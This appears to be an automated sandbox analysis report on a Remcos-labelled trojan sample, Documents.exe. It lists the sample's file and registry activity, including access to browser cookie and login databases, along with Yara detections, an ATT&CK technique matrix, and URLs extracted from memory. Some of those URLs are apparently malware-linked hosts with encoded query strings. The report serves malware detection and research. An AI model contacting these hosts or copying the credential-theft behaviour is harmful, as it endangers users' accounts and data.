                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Queries volume information: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Documents.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.Documents.exe.5bd0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Documents.exe.5bd0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                    Remote Access Functionality

                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.Documents.exe.5bd0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.Documents.exe.5bd0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    [Behavior graph (image not available): Behavior Graph ID: 1564384, Sample: Documents.exe, Startdate: 28/11/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    Documents.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
                    Documents.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\uFEeKIucsX.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
                    No Antivirus matches
                    No Antivirus matches
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://park.101datacenter.net/images/vendor-1/trustpilot.svgsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/mingrihuaqiluo/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/069a299928.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://0dyos.comvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/830f499165.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/128c40599466.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/jiuzhonghuannai/1/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://cs.deviceatlas-cdn.com/101dacs.jssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://park.101datacenter.net/images/vendor-1/icon/101domain.icosystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/14a40599580.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://park.101datacenter.net/images/vendor-1/google-reviews.svgsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/927a399069.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/baishimolinair/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/yasendi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.6822662.xyz/Dating/468c40599126.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDocuments.exe, 00000000.00000002.2154688065.0000000003376000.00000004.00000800.00020000.00000000.sdmp, uFEeKIucsX.exe, 0000000A.00000002.2277213173.00000000028E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.6822662.xyz/jiuzhonghuannai/2/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.6822662.xyz/jiuzhonghuannai/7/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referrasystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.101domain.com/resource_center.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.6822662.xyz/gongdilan/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cs.deviceatlas-cdn.com/smartclicksystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.6822662.xyz/lingcunaili/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.6822662.xyz/xidaoailiw/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.6822662.xyz/ruocainaiyang/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://park.101datacenter.net/css/fonts/LatoRegular.woff2systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.6822662.xyz/Dating/129d40599465.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cs.deviceatlas-cdn.comsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.6822662.xyz/youtianzhenxi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.ecosia.org/newtab/systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.6822662.xyz/jiuzhonghuannai/10/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.netvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/css/vendor-1.css?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/css/fonts/LatoRegular.woff)systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/zuozuomumingxi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/Dating/449a40599145.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/template/news/news10/css/layout.csssystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/js/modernizr-webp.js?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/jiuzhonghuannai/8/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/css/fonts/LatoRegular.woff2)systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZMsystray.exe, 00000011.00000002.4500910385.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.000000000352A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/images/vendor-1/park-back.webpvWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://park.101datacenter.net/js/pricing.js?20240925050808systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/Dating/776b40598818.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_sourcesystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/sitemap.xmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/jiuzhonghuannai/5/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPYsystray.exe, 00000011.00000002.4500910385.0000000005248000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003398000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.6822662.xyz/Dating/047a40599547.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
